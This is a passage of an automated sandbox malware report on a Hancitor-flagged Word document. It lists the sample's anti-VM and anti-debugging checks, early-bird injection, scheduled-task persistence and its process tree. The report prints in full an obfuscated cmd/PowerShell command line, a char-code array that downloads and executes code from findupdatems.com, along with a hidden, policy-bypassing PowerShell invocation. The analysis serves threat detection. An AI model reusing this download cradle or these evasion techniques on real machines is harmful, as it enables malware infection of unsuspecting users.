Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","vboxtray")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","vboxtray")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","secunia")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","hijack")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","vmtoolsd'")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","vmtoolsd'")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","vmtoolsd'")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","vbox")Name: KYEPC270
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function KYEPC270, API InStr("services.exe","vmware")Name: KYEPC270
Evasive VBA macro found (queries processes via WMI)
Source: VBA code instrumentation | OLE, VBA macro: Module ThisDocument, Function KYEPC270, API ExecQuery("SELECT NamE FROM WIn32_PRoCEsS") | Name: KYEPC270
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\splwow64.exe | Window / User API: threadDelayed 1056
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3519
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2122
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\splwow64.exe TID: 1736 | Thread sleep count: 1056 > 30
Source: C:\Windows\splwow64.exe TID: 1736 | Thread sleep time: -126720000s >= -30000s
Source: C:\Windows\splwow64.exe TID: 1736 | Thread sleep time: -120000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3048 | Thread sleep count: 3519 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3048 | Thread sleep count: 2122 > 30
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\splwow64.exe | Last function: Thread delayed
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
Source: splwow64.exe, 00000002.00000002.2362858959.051B0000.00000002.sdmp, powershell.exe, 0000000C.00000002.2383480413.08B80000.00000002.sdmp | Binary or memory string: A virtual machine could not be started because Hyper-V is not installed.
Queries a list of all running processes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation

Anti Debugging:

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))
Source: C:\Windows\System32\mshta.exe | System information queried: KernelDebuggerInformation
Creates guard pages, often used to prevent reverse engineering and debugging
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Early bird code injection technique detected
Source: C:\Windows\System32\cmd.exe | Process created / APC Queued / Resumed: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\cmd.exe 'C:\WiNDOws\sYsTEM32\Cmd.eXE' /c 'Set AYW= -jOIn[CHAr[]] (40 ,39 , 40 , 78,39, 43,39 , 101, 119, 45, 79,39, 43 ,39 , 98,106 , 101 ,99 ,116 , 32 , 78,101 , 116 , 46 ,87, 39 , 43, 39 ,101 , 98 , 99 , 108, 105 ,101 ,110, 116 , 41,39 , 43 ,39,46,39,43 ,39 ,100 , 111,119 , 110 ,108 , 111 ,39,43 ,39, 97 , 100,115 ,116, 114,105 , 110 , 103,40 ,72 ,108, 39,43,39, 106,104,116 , 39 , 43 , 39 , 116 ,112, 58 , 39, 43,39 , 47, 47, 102 ,105, 110 , 100 , 117, 112 , 100, 97 ,39 , 43,39 , 116 ,101,39 ,43,39 , 109, 115 ,46,99 ,111, 109 , 47,99 , 104,39, 43,39, 101, 39 , 43 , 39,99 ,107 ,47,105 ,110,39 ,43 , 39 , 100 , 101 ,120,72,108, 106, 41,39 ,43 ,39, 52, 106 , 39,43,39 , 122,73 , 69,88, 39, 41 ,46 ,82 ,101, 112, 76 , 97,67,101, 40 ,40 ,91 , 99, 104,65 ,114 ,93,55, 50,43 ,91, 99, 104,65 , 114, 93,49,48,56, 43,91 ,99, 104,65 ,114,93,49, 48 ,54 , 41, 44,91,83,116 , 114, 73 ,110,103, 93 ,91 ,99 ,104,65, 114 ,93,51, 57 , 41, 46 ,82,101,112,76, 97, 67 ,101, 40 , 40,91,99, 104, 65, 114, 93, 53 ,50
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe c:\WiNDOws\sYsTEM32\Cmd.eXE /c %gNpq%
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' ECHO inVOKe-ExPRessiON (get-ItEM eNV:AYw).valUe '
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWERsHElL -noPRoFI -EXEcuTiONpOlI BYPASS -noNi -NoeXi -WindoWStYlE HIdDen -
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown | Process created: C:\Windows\System32\cmd.exe 'C:\WiNDOws\sYsTEM32\Cmd.eXE' /c 'Set AYW= -jOIn[CHAr[]] (40 ,39 , 40 , 78,39, 43,39 , 101, 119, 45, 79,39, 43 ,39 , 98,106 , 101 ,99 ,116 , 32 , 78,101 , 116 , 46 ,87, 39 , 43, 39 ,101 , 98 , 99 , 108, 105 ,101 ,110, 116 , 41,39 , 43 ,39,46,39,43 ,39 ,100 , 111,119 , 110 ,108 , 111 ,39,43 ,39, 97 , 100,115 ,116, 114,105 , 110 , 103,40 ,72 ,108, 39,43,39, 106,104,116 , 39 , 43 , 39 , 116 ,112, 58 , 39, 43,39 , 47, 47, 102 ,105, 110 , 100 , 117, 112 , 100, 97 ,39 , 43,39 , 116 ,101,39 ,43,39 , 109, 115 ,46,99 ,111, 109 , 47,99 , 104,39, 43,39, 101, 39 , 43 , 39,99 ,107 ,47,105 ,110,39 ,43 , 39 , 100 , 101 ,120,72,108, 106, 41,39 ,43 ,39, 52, 106 , 39,43,39 , 122,73 , 69,88, 39, 41 ,46 ,82 ,101, 112, 76 , 97,67,101, 40 ,40 ,91 , 99, 104,65 ,114 ,93,55, 50,43 ,91, 99, 104,65 , 114, 93,49,48,56, 43,91 ,99, 104,65 ,114,93,49, 48 ,54 , 41, 44,91,83,116 , 114, 73 ,110,103, 93 ,91 ,99 ,104,65, 114 ,93,51, 57 , 41, 46 ,82,101,112,76, 97, 67 ,101, 40 , 40,91,99, 104, 65, 114, 93, 53 ,50
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\cmd.exe 'C:\WiNDOws\sYsTEM32\Cmd.eXE' /c 'Set AYW= -jOIn[CHAr[]] (40 ,39 , 40 , 78,39, 43,39 , 101, 119, 45, 79,39, 43 ,39 , 98,106 , 101 ,99 ,116 , 32 , 78,101 , 116 , 46 ,87, 39 , 43, 39 ,101 , 98 , 99 , 108, 105 ,101 ,110, 116 , 41,39 , 43 ,39,46,39,43 ,39 ,100 , 111,119 , 110 ,108 , 111 ,39,43 ,39, 97 , 100,115 ,116, 114,105 , 110 , 103,40 ,72 ,108, 39,43,39, 106,104,116 , 39 , 43 , 39 , 116 ,112, 58 , 39, 43,39 , 47, 47, 102 ,105, 110 , 100 , 117, 112 , 100, 97 ,39 , 43,39 , 116 ,101,39 ,43,39 , 109, 115 ,46,99 ,111, 109 , 47,99 , 104,39, 43,39, 101, 39 , 43 , 39,99 ,107 ,47,105 ,110,39 ,43 , 39 , 100 , 101 ,120,72,108, 106, 41,39 ,43 ,39, 52, 106 , 39,43,39 , 122,73 , 69,88, 39, 41 ,46 ,82 ,101, 112, 76 , 97,67,101, 40 ,40 ,91 , 99, 104,65 ,114 ,93,55, 50,43 ,91, 99, 104,65 , 114, 93,49,48,56, 43,91 ,99, 104,65 ,114,93,49, 48 ,54 , 41, 44,91,83,116 , 114, 73 ,110,103, 93 ,91 ,99 ,104,65, 114 ,93,51, 57 , 41, 46 ,82,101,112,76, 97, 67 ,101, 40 , 40,91,99, 104, 65, 114, 93, 53 ,50
May try to detect the Windows Explorer process (often used for injection)
Source: splwow64.exe, 00000002.00000002.2362762517.03D70000.00000002.sdmp, mshta.exe, 00000007.00000002.2367284180.03B60000.00000002.sdmp, conhost.exe, 00000009.00000002.2372673866.03F90000.00000002.sdmp, powershell.exe, 0000000C.00000002.2377845234.04160000.00000002.sdmp | Binary or memory string: Progman
Source: splwow64.exe, 00000002.00000002.2362762517.03D70000.00000002.sdmp, mshta.exe, 00000007.00000002.2367284180.03B60000.00000002.sdmp, conhost.exe, 00000009.00000002.2372673866.03F90000.00000002.sdmp, powershell.exe, 0000000C.00000002.2377845234.04160000.00000002.sdmp | Binary or memory string: Program Manager
Source: splwow64.exe, 00000002.00000002.2362762517.03D70000.00000002.sdmp, mshta.exe, 00000007.00000002.2367284180.03B60000.00000002.sdmp, conhost.exe, 00000009.00000002.2372673866.03F90000.00000002.sdmp, powershell.exe, 0000000C.00000002.2377845234.04160000.00000002.sdmp | Binary or memory string: Shell_TrayWnd
Source: splwow64.exe, 00000002.00000002.2362762517.03D70000.00000002.sdmp, mshta.exe, 00000007.00000002.2367284180.03B60000.00000002.sdmp, conhost.exe, 00000009.00000002.2372673866.03F90000.00000002.sdmp, powershell.exe, 0000000C.00000002.2377845234.04160000.00000002.sdmp | Binary or memory string: SGProgman

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Diagnostics.Tracing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Diagnostics.Tracing.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package-AutoMerged-admin~31bf3856ad364e35~x86~~10.0.10586.0.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Queries the cryptographic machine GUID
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Behavior Graph


Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
Behavior Graph ID: 64199 | Sample: 18#U042f.doc | Startdate: 17/11/2018 | Architecture: WINDOWS | Score: 100

Signatures on the sample (graph node 2):
  • Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
  • Antivirus detection for submitted file
  • Multi AV Scanner detection for submitted file
  • 8 other signatures

Process tree (node numbers and counts as shown in the graph):
  • 2 (sample) started 8 mshta.exe and 11 WINWORD.EXE 428 29
  • 8 mshta.exe: Obfuscated command line found; PowerShell case anomaly found; started 14 cmd.exe 1
  • 11 WINWORD.EXE: dropped C:\Users\user\AppData\Roaming\WPFT532.hta (data); Document exploit detected (process start blacklist hit); started 16 schtasks.exe 1, 18 schtasks.exe 1, 20 schtasks.exe 1 and 22 (2 other processes)
  • 14 cmd.exe: started 24 cmd.exe 1 and 27 conhost.exe
  • 16, 18, 20 schtasks.exe and 22: each started a conhost.exe (29, 31, 33, 35)
  • 24 cmd.exe: Early bird code injection technique detected; PowerShell case anomaly found; started 37 powershell.exe 14 29 and 40 cmd.exe 1
  • 37 powershell.exe: DNS/IP 44 findupdatems.com

Simulations

Behavior and APIs

Time | Type | Description
23:00:12 | API Interceptor | 3x Sleep call for process: WINWORD.EXE modified
23:00:15 | API Interceptor | 1123x Sleep call for process: splwow64.exe modified
23:00:34 | Task Scheduler | Run new task: DriveCloudTaskCoreCheck path: mshta s>C:\Users\user\AppData\Roaming\WPFT532.hta

Antivirus Detection

Initial Sample

Source | Detection | Scanner | Label
18#U042f.doc | 61% | virustotal |
18#U042f.doc | 100% | Avira | W97M/Hancitor.hwhzo

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source | Detection | Scanner | Label
findupdatems.com | 0% | virustotal |

URLs

Source | Detection | Scanner | Label
http://findupdatems.com | 0% | virustotal |
http://findupdatems.com | 0% | Avira URL Cloud | safe
http://findupdatems.com/check/index | 0% | virustotal |
http://findupdatems.com/check/index | 0% | Avira URL Cloud | safe
http://findupdatems.com/ch | 0% | Avira URL Cloud | safe
http://findupdatems.com/check/indexd | 0% | Avira URL Cloud | safe
http://www.microsoft.c | 0% | Avira URL Cloud | safe
http://findupdatems.com/check/indexHlj)4jzIEX$ | 0% | Avira URL Cloud | safe

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

Source | Rule | Description | Author
00000007.00000002.2369970087.058E0000.00000004.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth
0000000C.00000002.2380851729.06F8A000.00000004.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth
0000000C.00000003.2186142865.005BA000.00000004.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth
00000007.00000002.2365632769.00600000.00000004.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth
00000007.00000002.2365595933.005DE000.00000004.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth
0000000C.00000002.2374595497.00910000.00000004.sdmp | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth

Unpacked PEs

No yara matches

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

Dropped Files

No context

Screenshots

Thumbnails
